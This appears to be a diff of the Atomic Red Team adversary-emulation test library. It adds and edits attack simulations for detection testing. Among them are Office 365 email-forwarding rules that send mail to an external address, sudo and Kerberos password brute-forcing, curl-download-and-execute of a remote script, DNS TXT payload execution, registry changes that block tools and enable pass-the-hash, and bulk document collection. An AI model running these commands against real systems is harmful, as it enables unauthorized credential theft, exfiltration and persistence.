+          description: destination email addresses
+          type: String
+          default: Atomic_Operator@fakeemail.aq
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "ExchangeOnlineManagement PowerShell module must be installed.
+          Your user must also have an Exchange license. \n"
+        prereq_command: |
+          $RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
+          if (-not $RequiredModule) {exit 1}
+          if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
+        get_prereq_command: "Install-Module -Name ExchangeOnlineManagement         \nImport-Module
+          ExchangeOnlineManagement\n"
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-ExchangeOnline -Credential $creds
+          New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}"
+        cleanup_command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-ExchangeOnline -Credential $creds
+          Get-InboxRule | Where-Object { $_.Name -eq "#{rule_name}" | ForEach-Object { Remove-InboxRule -Identity $_.Identity -Force -Confirm:$False }
+        name: powershell
+        elevation_required: false
   T1074:
     technique:
       x_mitre_platforms:
@@ -73199,8 +73486,11 @@ credential-access:
           Write-Host "End of bruteforce"
     - name: SUDO brute force Debian
       auto_generated_guid: 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a
-      description: "Brute force the password of a local user account which is a member
-        of the sudo'ers group on a Debian based Linux distribution.  \n"
+      description: |
+        Attempts to sudo with current user using passwords from a list.  Will run sudo 3 times, each with 3 different password attempts.
+        PreRequisites : debian,ubuntu,kali and pam_tally NOT configured.
+        If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers.
+        The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers"
       supported_platforms:
       - linux
       dependency_executor_name: sh
@@ -73211,32 +73501,18 @@ credential-access:
         prereq_command: |
           if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
           if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
+          cp PathToAtomicsFolder/T1110.001/src/passwords.txt /tmp/workingfile
+          cp PathToAtomicsFolder/T1110.001/src/asker.sh /tmp/asker && chmod 755 /tmp/asker
           if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
-          if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi
-        get_prereq_command: 'apt-get update && apt-get install -y openssl sudo
+        get_prereq_command: 'apt-get update && apt-get install -y sudo
 
           '
       executor:
-        elevation_required: true
+        elevation_required: false
         command: |
-          useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password) target
-          su target
-
-          PASSWORDS=(one two three password five); \
-              touch /tmp/file; \
-              for P in ${PASSWORDS[@]}; do \
-                  date +"%b %d %T"; \
-                  sudo -k && echo "$P" |sudo -S whoami &>/tmp/file; \
-                  echo "exit: $?"; \
-                  if grep -q "root" /tmp/file; then \
-                      echo "FOUND: sudo => $P"; break; \
-                  else \
-                      echo "TRIED: $P"; \
-                  fi; \
-                  sleep 2; \
-              done; \
-              rm /tmp/file
-        cleanup_command: 'userdel target
+          for i in 1 2 3 ; do SUDO_ASKPASS=/tmp/asker sudo -k -A whoami && wc -l /tmp/workingfile; done
+          echo done
+        cleanup_command: 'rm -f /tmp/asker /tmp/workingfile
 
           '
         name: sh
@@ -73327,7 +73603,7 @@ credential-access:
         name: powershell
         elevation_required: false
         command: "cd $env:temp\n.\\kerbrute.exe bruteuser --dc #{domaincontroller}
-          -d #{domain} $env:temp\\bruteuser.txt TestUser1 "
+          -d #{domain} $env:temp\\bruteuser.txt TestUser1 \n"
   T1003:
     technique:
       x_mitre_platforms:
@@ -85663,16 +85939,18 @@ discovery:
         elevation_required: true
     - name: Linux List Kernel Modules
       auto_generated_guid: 034fe21c-3186-49dd-8d5d-128b35f181c7
-      description: 'Identify kernel modules installed. Upon successful execution stdout
-        will display kernel modules installed on host.
+      description: 'Enumerate kernel modules installed 3 different ways. Upon successful
+        execution stdout will display kernel modules installed on host 2 times, followed
+        by list of modules matching ''vmw'' if present.
 
         '
       supported_platforms:
       - linux
       executor:
         command: |
-          sudo lsmod
-          sudo kmod list
+          lsmod
+          kmod list
+          grep vmw /proc/modules
         name: sh
   T1010:
     technique:
@@ -95654,7 +95932,7 @@ command-and-control:
         remote_url:
           description: url of remote payload
           type: string
-          default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh
         payload_name:
           description: payload name
           type: string
@@ -95663,7 +95941,7 @@ command-and-control:
         command: 'curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name}
 
           '
-        cleanup_command: 'del #{payload_name}
+        cleanup_command: 'rm #{payload_name}
 
           '
         name: sh

atomics/T1059.001/T1059.001.md

@@ -52,6 +52,8 @@ PowerShell commands/scripts can also be executed without directly invoking the <
 
 - [Atomic Test #21 - PowerUp Invoke-AllChecks](#atomic-test-21---powerup-invoke-allchecks)
 
+- [Atomic Test #22 - Abuse Nslookup with DNS Records](#atomic-test-22---abuse-nslookup-with-dns-records)
+
 
 <br/>
 
@@ -874,4 +876,36 @@ Invoke-AllChecks
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #22 - Abuse Nslookup with DNS Records
+Red teamer's avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with a payload to compromise hosts.
+[reference](https://twitter.com/jstrosch/status/1237382986557001729)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 999bff6d-dc15-44c9-9f5c-e1051bfc86e1
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
+# this would not be part of a real attack but helpful for this simulation
+function nslookup  { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
+powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
+```
+
+
+
+
+
+
 <br/>

atomics/T1059.001/T1059.001.yaml

@@ -424,3 +424,20 @@ atomic_tests:
       iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
       Invoke-AllChecks
     name: powershell
+
+
+- name: Abuse Nslookup with DNS Records
+  auto_generated_guid: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1
+  description: |
+    Red teamer's avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with a payload to compromise hosts.
+    [reference](https://twitter.com/jstrosch/status/1237382986557001729)
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      # creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
+      # this would not be part of a real attack but helpful for this simulation
+      function nslookup  { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
+      powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
+    name: powershell
+ 

atomics/T1082/T1082.md

@@ -827,7 +827,7 @@ Install-Module -Name Az -Force
 <br/>
 
 ## Atomic Test #24 - Linux List Kernel Modules
-Identify kernel modules installed. Upon successful execution stdout will display kernel modules installed on host.
+Enumerate kernel modules installed 3 different ways. Upon successful execution stdout will display kernel modules installed on host 2 times, followed by list of modules matching 'vmw' if present.
 
 **Supported Platforms:** Linux
 
@@ -843,8 +843,9 @@ Identify kernel modules installed. Upon successful execution stdout will display
 
 
 ```sh
-sudo lsmod
-sudo kmod list
+lsmod
+kmod list
+grep vmw /proc/modules
 ```
 
 

atomics/T1082/T1082.yaml

@@ -337,11 +337,12 @@ atomic_tests:
 - name: Linux List Kernel Modules
   auto_generated_guid: 034fe21c-3186-49dd-8d5d-128b35f181c7
   description: |
-    Identify kernel modules installed. Upon successful execution stdout will display kernel modules installed on host.
+    Enumerate kernel modules installed 3 different ways. Upon successful execution stdout will display kernel modules installed on host 2 times, followed by list of modules matching 'vmw' if present.
   supported_platforms:
   - linux
   executor:
     command: |
-      sudo lsmod
-      sudo kmod list
+      lsmod
+      kmod list
+      grep vmw /proc/modules
     name: sh

atomics/T1105/T1105.md

@@ -1231,7 +1231,7 @@ Utilize linux Curl to download a remote file, chmod +x it and run it.
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| remote_url | url of remote payload | string | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/|
+| remote_url | url of remote payload | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh|
 | payload_name | payload name | string | atomic.sh|
 
 
@@ -1244,7 +1244,7 @@ curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name}
 
 #### Cleanup Commands:
 ```sh
-del #{payload_name}
+rm #{payload_name}
 ```
 
 

atomics/T1105/T1105.yaml

@@ -748,7 +748,7 @@ atomic_tests:
     remote_url:
       description: url of remote payload
       type: string
-      default:  https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/
+      default:  https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh
     payload_name:
       description: payload name
       type: string
@@ -757,7 +757,7 @@ atomic_tests:
     command: |
       curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name}
     cleanup_command: |
-      del #{payload_name}
+      rm #{payload_name}
     name: sh
 - name: Nimgrab - Transfer Files
   auto_generated_guid: b1729c57-9384-4d1c-9b99-9b220afb384e

atomics/T1110.001/T1110.001.md

@@ -199,7 +199,10 @@ Install-Module -Name AzureAD -Force
 <br/>
 
 ## Atomic Test #4 - SUDO brute force Debian
-Brute force the password of a local user account which is a member of the sudo'ers group on a Debian based Linux distribution.
+Attempts to sudo with current user using passwords from a list.  Will run sudo 3 times, each with 3 different password attempts.
+PreRequisites : debian,ubuntu,kali and pam_tally NOT configured.
+If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers.
+The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers"
 
 **Supported Platforms:** Linux
 
@@ -211,32 +214,17 @@ Brute force the password of a local user account which is a member of the sudo'e
 
 
 
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+#### Attack Commands: Run with `sh`! 
 
 
 ```sh
-useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password) target
-su target
-
-PASSWORDS=(one two three password five); \
-    touch /tmp/file; \
-    for P in ${PASSWORDS[@]}; do \
-        date +"%b %d %T"; \
-        sudo -k && echo "$P" |sudo -S whoami &>/tmp/file; \
-        echo "exit: $?"; \
-        if grep -q "root" /tmp/file; then \
-            echo "FOUND: sudo => $P"; break; \
-        else \
-            echo "TRIED: $P"; \
-        fi; \
-        sleep 2; \
-    done; \
-    rm /tmp/file
+for i in 1 2 3 ; do SUDO_ASKPASS=/tmp/asker sudo -k -A whoami && wc -l /tmp/workingfile; done
+echo done
 ```
 
 #### Cleanup Commands:
 ```sh
-userdel target
+rm -f /tmp/asker /tmp/workingfile
 ```
 
 
@@ -247,12 +235,13 @@ userdel target
 ```sh
 if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
 if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
+cp PathToAtomicsFolder/T1110.001/src/passwords.txt /tmp/workingfile
+cp PathToAtomicsFolder/T1110.001/src/asker.sh /tmp/asker && chmod 755 /tmp/asker
 if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
-if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi
 ```
 ##### Get Prereq Commands:
 ```sh
-apt-get update && apt-get install -y openssl sudo
+apt-get update && apt-get install -y sudo
 ```
 
 

atomics/T1110.001/T1110.001.yaml

@@ -120,7 +120,10 @@ atomic_tests:
 - name: SUDO brute force Debian
   auto_generated_guid: 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a
   description: |
-    Brute force the password of a local user account which is a member of the sudo'ers group on a Debian based Linux distribution.  
+    Attempts to sudo with current user using passwords from a list.  Will run sudo 3 times, each with 3 different password attempts.
+    PreRequisites : debian,ubuntu,kali and pam_tally NOT configured.
+    If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers.
+    The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers"
   supported_platforms:
     - linux
   dependency_executor_name: sh
@@ -130,32 +133,18 @@ atomic_tests:
     prereq_command: |
       if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
       if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
+      cp PathToAtomicsFolder/T1110.001/src/passwords.txt /tmp/workingfile
+      cp PathToAtomicsFolder/T1110.001/src/asker.sh /tmp/asker && chmod 755 /tmp/asker
       if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi
-      if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi
     get_prereq_command: |
-      apt-get update && apt-get install -y openssl sudo
+      apt-get update && apt-get install -y sudo
   executor:
-    elevation_required: true 
+    elevation_required: false
     command: |
-      useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password) target
-      su target
-
-      PASSWORDS=(one two three password five); \
-          touch /tmp/file; \
-          for P in ${PASSWORDS[@]}; do \
-              date +"%b %d %T"; \
-              sudo -k && echo "$P" |sudo -S whoami &>/tmp/file; \
-              echo "exit: $?"; \
-              if grep -q "root" /tmp/file; then \
-                  echo "FOUND: sudo => $P"; break; \
-              else \
-                  echo "TRIED: $P"; \
-              fi; \
-              sleep 2; \
-          done; \
-          rm /tmp/file
+      for i in 1 2 3 ; do SUDO_ASKPASS=/tmp/asker sudo -k -A whoami && wc -l /tmp/workingfile; done
+      echo done
     cleanup_command: |
-      userdel target
+      rm -f /tmp/asker /tmp/workingfile
     name: sh
 
 - name: SUDO brute force Redhat
@@ -232,4 +221,4 @@ atomic_tests:
     elevation_required: false
     command: |
       cd $env:temp
-      .\kerbrute.exe bruteuser --dc #{domaincontroller} -d #{domain} $env:temp\bruteuser.txt TestUser1 
+      .\kerbrute.exe bruteuser --dc #{domaincontroller} -d #{domain} $env:temp\bruteuser.txt TestUser1 

atomics/T1110.001/src/asker.sh

@@ -0,0 +1,4 @@
+#!/bin/sh
+WORD=`tail -1 /tmp/workingfile`
+sed -i '$d' /tmp/workingfile
+echo $WORD

atomics/T1112/T1112.md

@@ -94,7 +94,9 @@ The Registry of a remote system may be modified to aid in execution of files as
 
 - [Atomic Test #42 - Disable Windows Error Reporting Settings](#atomic-test-42---disable-windows-error-reporting-settings)
 
-- [Atomic Test #43 - DisallowRun Execution Of Certain Application](#atomic-test-43---disallowrun-execution-of-certain-application)
+- [Atomic Test #43 - DisallowRun Execution Of Certain Applications](#atomic-test-43---disallowrun-execution-of-certain-applications)
+
+- [Atomic Test #44 - Enabling Restricted Admin Mode via Command_Prompt](#atomic-test-44---enabling-restricted-admin-mode-via-command_prompt)
 
 
 <br/>
@@ -1579,10 +1581,9 @@ reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v Disabl
 <br/>
 <br/>
 
-## Atomic Test #43 - DisallowRun Execution Of Certain Application
+## Atomic Test #43 - DisallowRun Execution Of Certain Applications
 Modify the registry of the currently logged in user using reg.exe via cmd console to prevent user running specific computer programs that could aid them in manually removing malware or detecting it 
 using security product.
-See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
 
 **Supported Platforms:** Windows
 
@@ -1599,13 +1600,47 @@ See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe
 
 ```cmd
 reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /t REG_DWORD /d 1 /f
-reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /f /t REG_SZ /v art1 /d "regedit.exe"
+reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /f /t REG_SZ /v art2 /d "cmd.exe"
 ```
 
 #### Cleanup Commands:
 ```cmd
 reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /f >nul 2>&1
-reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v 1 /f >nul 2>&1
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v art1 /f >nul 2>&1
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v art2 /f >nul 2>&1
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #44 - Enabling Restricted Admin Mode via Command_Prompt
+Enabling Restricted Admin Mode via Command_Prompt,enables an attacker to perform a pass-the-hash attack using RDP
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** fe7974e5-5813-477b-a7bd-311d4f535e83
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAdmin /t REG_DWORD /d 0
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAdmin >nul 2>&1
 ```
 
 

atomics/T1112/T1112.yaml

@@ -674,20 +674,34 @@ atomic_tests:
       reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
     name: command_prompt
     elevation_required: true
-- name: DisallowRun Execution Of Certain Application
+- name: DisallowRun Execution Of Certain Applications
   auto_generated_guid: 71db768a-5a9c-4047-b5e7-59e01f188e84
   description: |
     Modify the registry of the currently logged in user using reg.exe via cmd console to prevent user running specific computer programs that could aid them in manually removing malware or detecting it 
     using security product.
-    See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
   supported_platforms:
   - windows
   executor:
     command: |
       reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /t REG_DWORD /d 1 /f
-      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /f /t REG_SZ /v art1 /d "regedit.exe"
+      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /f /t REG_SZ /v art2 /d "cmd.exe"
     cleanup_command: |
       reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /f >nul 2>&1
-      reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v 1 /f >nul 2>&1
+      reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v art1 /f >nul 2>&1
+      reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v art2 /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Enabling Restricted Admin Mode via Command_Prompt
+  auto_generated_guid: fe7974e5-5813-477b-a7bd-311d4f535e83
+  description: |
+    Enabling Restricted Admin Mode via Command_Prompt,enables an attacker to perform a pass-the-hash attack using RDP
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAdmin /t REG_DWORD /d 0
+    cleanup_command: |
+      reg delete "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAdmin >nul 2>&1
     name: command_prompt
     elevation_required: true

atomics/T1114.003/T1114.003.md

@@ -0,0 +1,72 @@
+# T1114.003 - Email Collection: Email Forwarding Rule
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1114/003)
+<blockquote>Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)
+
+Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Office365 - Email Forwarding](#atomic-test-1---office365---email-forwarding)
+
+
+<br/>
+
+## Atomic Test #1 - Office365 - Email Forwarding
+Creates a new Inbox Rule to forward emails to an external user via the "ForwardTo" property of the New-InboxRule Powershell cmdlet.
+
+**Supported Platforms:** Office-365
+
+
+**auto_generated_guid:** 3234117e-151d-4254-9150-3d0bac41e38c
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | office-365 username | String | |
+| password | office-365 password | String | |
+| rule_name | email rule name | String | Atomic Red Team Email Rule|
+| forwarding_email | destination email addresses | String | Atomic_Operator@fakeemail.aq|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+Connect-ExchangeOnline -Credential $creds
+New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}"
+```
+
+#### Cleanup Commands:
+```powershell
+$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+Connect-ExchangeOnline -Credential $creds
+Get-InboxRule | Where-Object { $_.Name -eq "#{rule_name}" | ForEach-Object { Remove-InboxRule -Identity $_.Identity -Force -Confirm:$False }
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: ExchangeOnlineManagement PowerShell module must be installed. Your user must also have an Exchange license.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name ExchangeOnlineManagement         
+Import-Module ExchangeOnlineManagement
+```
+
+
+
+
+<br/>

atomics/T1114.003/T1114.003.yaml

@@ -0,0 +1,50 @@
+attack_technique: T1114.003
+display_name: 'Email Collection: Email Forwarding Rule'
+atomic_tests:
+- name: Office365 - Email Forwarding
+  auto_generated_guid: 3234117e-151d-4254-9150-3d0bac41e38c
+  description: |
+    Creates a new Inbox Rule to forward emails to an external user via the "ForwardTo" property of the New-InboxRule Powershell cmdlet.
+  supported_platforms:
+  - office-365
+  input_arguments:
+    username:
+      description: office-365 username
+      type: String
+      default: null
+    password:
+      description: office-365 password
+      type: String
+      default: null
+    rule_name:
+      description: email rule name
+      type: String
+      default: "Atomic Red Team Email Rule"
+    forwarding_email:
+      description: destination email addresses
+      type: String
+      default: "Atomic_Operator@fakeemail.aq"
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      ExchangeOnlineManagement PowerShell module must be installed. Your user must also have an Exchange license. 
+    prereq_command: |
+      $RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
+      if (-not $RequiredModule) {exit 1}
+      if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
+    get_prereq_command: |
+      Install-Module -Name ExchangeOnlineManagement         
+      Import-Module ExchangeOnlineManagement
+  executor:
+    command: |
+      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+      Connect-ExchangeOnline -Credential $creds
+      New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}"
+    cleanup_command: |
+      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+      Connect-ExchangeOnline -Credential $creds
+      Get-InboxRule | Where-Object { $_.Name -eq "#{rule_name}" | ForEach-Object { Remove-InboxRule -Identity $_.Identity -Force -Confirm:$False }
+    name: powershell
+    elevation_required: false

atomics/T1119/T1119.md

@@ -37,7 +37,7 @@ to see what was collected.
 ```cmd
 mkdir %temp%\T1119_command_prompt_collection >nul 2>&1
 dir c: /b /s .docx | findstr /e .docx
-for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection
+for /R c:\ %f in (*.docx) do copy /Y %f %temp%\T1119_command_prompt_collection
 ```
 
 #### Cleanup Commands:

atomics/T1119/T1119.yaml

@@ -12,7 +12,7 @@ atomic_tests:
     command: |
       mkdir %temp%\T1119_command_prompt_collection >nul 2>&1
       dir c: /b /s .docx | findstr /e .docx
-      for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection
+      for /R c:\ %f in (*.docx) do copy /Y %f %temp%\T1119_command_prompt_collection
     cleanup_command: |
       del %temp%\T1119_command_prompt_collection /F /Q >nul 2>&1
     name: command_prompt

atomics/T1137.006/T1137.006.md

@@ -6,15 +6,19 @@ Add-ins can be used to obtain persistence because they can be set to execute cod
 
 ## Atomic Tests
 
-- [Atomic Test #1 - Code Executed Via Excel Add-in File (Xll)](#atomic-test-1---code-executed-via-excel-add-in-file-xll)
+- [Atomic Test #1 - Code Executed Via Excel Add-in File (XLL)](#atomic-test-1---code-executed-via-excel-add-in-file-xll)
 
 
 <br/>
 
-## Atomic Test #1 - Code Executed Via Excel Add-in File (Xll)
+## Atomic Test #1 - Code Executed Via Excel Add-in File (XLL)
 Downloads a XLL file and loads it using the excel add-ins library.
-This causes excel to display the message "Hello World"
-Source of XLL - https://github.com/edparcell/HelloWorldXll
+This causes excel to display the message "Hello World". This does not include persistent code execution.
+
+The provided XLL is for 64-bit versions of Excel only. If you are using a 32-bit version this will fail and "False" will
+be printed to the screen.
+
+[Source of XLL](https://github.com/edparcell/HelloWorldXll)
 
 **Supported Platforms:** Windows
 
@@ -32,11 +36,11 @@ Source of XLL - https://github.com/edparcell/HelloWorldXll
 | local_file | name of the xll file | Path | $env:tmp&#92;HelloWorldXll.xll|
 
 
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+#### Attack Commands: Run with `powershell`! 
 
 
 ```powershell
-powershell -c "iwr -URI '#{xll_url}' -o '#{local_file}'; IEX ((new-object -ComObject excel.application).RegisterXLL('$env:tmp\HelloWorldXll.xll'))"
+iwr -URI '#{xll_url}' -o "#{local_file}"; (new-object -ComObject excel.application).RegisterXLL("$env:tmp\HelloWorldXll.xll")
 ```
 
 

atomics/T1137.006/T1137.006.yaml

@@ -1,12 +1,16 @@
 attack_technique: T1137.006
 display_name: 'Office Application Startup: Add-ins'
 atomic_tests:
-- name: Code Executed Via Excel Add-in File (Xll)
+- name: Code Executed Via Excel Add-in File (XLL)
   auto_generated_guid: 441b1a0f-a771-428a-8af0-e99e4698cda3
   description: |
     Downloads a XLL file and loads it using the excel add-ins library.
-    This causes excel to display the message "Hello World"
-    Source of XLL - https://github.com/edparcell/HelloWorldXll 
+    This causes excel to display the message "Hello World". This does not include persistent code execution.
+    
+    The provided XLL is for 64-bit versions of Excel only. If you are using a 32-bit version this will fail and "False" will
+    be printed to the screen.
+    
+    [Source of XLL](https://github.com/edparcell/HelloWorldXll) 
   supported_platforms:
     - windows
   input_arguments:
@@ -17,9 +21,8 @@ atomic_tests:
     local_file:
       description: name of the xll file 
       type: Path
-      default: '$env:tmp\HelloWorldXll.xll'
+      default: $env:tmp\HelloWorldXll.xll
   executor:
-    name: powershell
-    elevation_required: true 
+    name: powershell 
     command: |
-      powershell -c "iwr -URI '#{xll_url}' -o '#{local_file}'; IEX ((new-object -ComObject excel.application).RegisterXLL('$env:tmp\HelloWorldXll.xll'))"
+      iwr -URI '#{xll_url}' -o "#{local_file}"; (new-object -ComObject excel.application).RegisterXLL("$env:tmp\HelloWorldXll.xll")

atomics/T1505.004/T1505.004.md

@@ -0,0 +1,125 @@
+# T1505.004 - IIS Components
